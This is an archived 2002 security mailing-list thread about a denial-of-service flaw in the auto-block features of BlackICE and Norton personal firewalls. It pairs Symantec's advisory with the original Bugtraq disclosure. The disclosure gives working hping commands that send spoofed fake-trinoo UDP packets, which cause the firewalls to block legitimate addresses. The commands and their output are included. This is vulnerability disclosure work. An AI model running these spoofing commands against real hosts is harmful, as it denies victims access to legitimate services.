Re: Multiple Vendor PC firewall remote denial of services Vulnerability

[Sym Security]

Ref: Bugtraq message,  Multiple Vendor PC firewall remote denial of
services Vulnerability,
Date:  Oct 8 2002 2:16AM
Author:  Yiming Gong <[EMAIL PROTECTED]>
Message-ID:  <002701c26e70$a882eba0$f8ff1dda@penetrat>

Overview
In a default installation, some personal firewall software will work
with auto-block function on, and this time if you fake a high level
dangerous attack packet with spoof address target these pc, these
firewall will immediately block the spoofed ip address without any
further judgement. Thus, an intruders might quickly block quite a great
internet address for a victim pc remotely.

Example
I¡¯ve test this on BlackICE and Norton personal firewall

-snip



October 9, 2002

Symantec Personal Firewall AutoBlock DoS

Risk
Low

Overview

Symantec was notified of a potential denial-of-service (DoS) issue with
Symantec Norton Personal Firewall's AutoBlock feature.  The discoverer,
Yiming Gong, China Netcom, subsequently posted the findings to the BugTraq
mailing list,
http://online.securityfocus.com/archive/1/294411/2002-10-06/2002-10-12/0.
prior to a coordinated response from Symantec.  According to the
discoverer, by directing an attack against a user of a personal firewall
providing a form of auto blocking capability and by spoofing a valid IP
address, an attacker could potentially create a DoS of that address when
the AutoBlock feature blocks access to the IP address for a period of time.
In this manner, a valid IP address, could possibly be temporarily denied to
the user of the personal firewall.

Products/Versions
Symantec Norton Personal Firewall 2002
Symantec Norton Personal Firewall 2003
Symantec Norton Internet Security 2002
Symantec Norton Internet Security 2003

Symantec Response

Symantec considers the AutoBlock feature of their personal firewall
products to be a valuable part of any Internet security capability.  While
the scenario described in the referenced Bugtraq posting could cause a
minor temporary DoS, a concerted attack of this type would, by its very
nature be of limited scope.  The default timeout for AutoBlock is 30
minutes so even if an IP address were to be blocked in this manner, it
would be for a limited period.

Symantec's AutoBlock feature does provide an exclusion list so that should
a user becomes aware of a spoofed DoS attack of this nature, they could
place the valid IP address in the AutoBlock exclusion list to prevent the
valid site from being blocked automatically.  The attack packets from the
spoofed IP address used in the DoS attempt would still be intercepted by
the firewall, but the intended DoS by the attacker would be thwarted.

However, while Symantec considers a threat of this nature to be very low
risk and highly limited in scope, we are continuously working to increase
the security capability and posture of our products.  Symantec is
researching ways of building additional intelligent decision capability
into our AutoBlock feature.

Credit

Symantec takes the security and proper functionality of our products very
seriously.  Anyone with information on security issues with Symantec
products should contact [EMAIL PROTECTED]


Copyright (c) 2002 by Symantec Corp.
Permission to redistribute this alert electronically is granted as long as
it is not edited in any way unless authorized by Symantec Security
Response. Reprinting the whole or part of this alert in medium other than
electronically requires permission from [EMAIL PROTECTED]

Disclaimer
The information in the advisory is believed to be accurate at the time of
printing based on currently available information. Use of the information
constitutes acceptance for use in an AS IS condition. There are no
warranties with regard to this information. Neither the author nor the
publisher accepts any liability for any direct, indirect or consequential
loss or damage arising from use of, or reliance on this information.
Symantec, Symantec products, Symantec Security Response, and SymSecurity
are registered trademarks of Symantec Corp. and/or affiliated companies in
the United States and other countries. All other registered and
unregistered trademarks represented in this document are the sole property
of their respective companies/owners.

Multiple Vendor PC firewall remote denial of services Vulnerability

[Yiming Gong]

Overview
In a default installation, some personal firewall software will work
with auto-block function on, and this time if you fake a high level
dangerous attack packet with spoof address target these pc, these
firewall will immediately block the spoofed ip address without any
further judgement. Thus, an intruders might quickly block quite a great
internet address for a victim pc remotely.

Example
I¡¯ve test this on BlackICE and Norton personal firewall

Below are the steps and result of the test on BlackICE,

step 1:A clean and DEFAULT installation of  blackice defender for
server(version 2.9.cap) on a win2k server  
pc,which ip address is ip.add.of.victim

step 2:On a linux box with hping (a free soft can get from
www.hping.org) installed,perform the following three  
commands:
---
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a ip.add.
of.dnsserver
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers
+ 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a
www.google.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers
+ 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a
www.networkice.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers
+ 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
---
These three commands all do the same thing:send fake trinoo
communication udp packet to our target machine  
ip.add.of.victim with spoofed ip adress. ( google,networkeice,and
ip.add.of.dnsserver-our dns server)

result:Each time the command executed,the blackice icon on the windows
system tray flash,and an entries added   
in blackice 's Advanced Frirewall Settings automatically whick block all
the packet of the spoofed  
address.And the spoofed ip address is unreachable immediately.

The test steps and result of Norton personal firewall are almost the
same, using  hping -e 13 -d 2 -s 6000 -p 2140 -2 ip.of.remote.victimpc
-c 2 -a ip.of.spoofed.address instead.

Vendor Response
I¡¯ve contacted [EMAIL PROTECTED] and [EMAIL PROTECTED] on Sep 24,
2002, Symantec told me they have forwarded my concerns on to the
appropriate team, and BlackIce reply me As the product exists now, there
is nothing that can be done to correct this.  And they are in the hopes
that something can be done in a future release.

Affected Versions:
--
I have test the following product

BlackICE Defender for server version 2.9.cap
BlackICE Server Protection version 3.5.cdf
Norton personal firewall 2002 (version 4.0)
All are vulnerable.



 
 
-- 
ÎÒÒª¸üºÃµÄÉú»î 



Yiming Gong 
Senior System Administrator 
China Netcom
[EMAIL PROTECTED] 
http://security.zz.ha.cn 
0086-371-7934907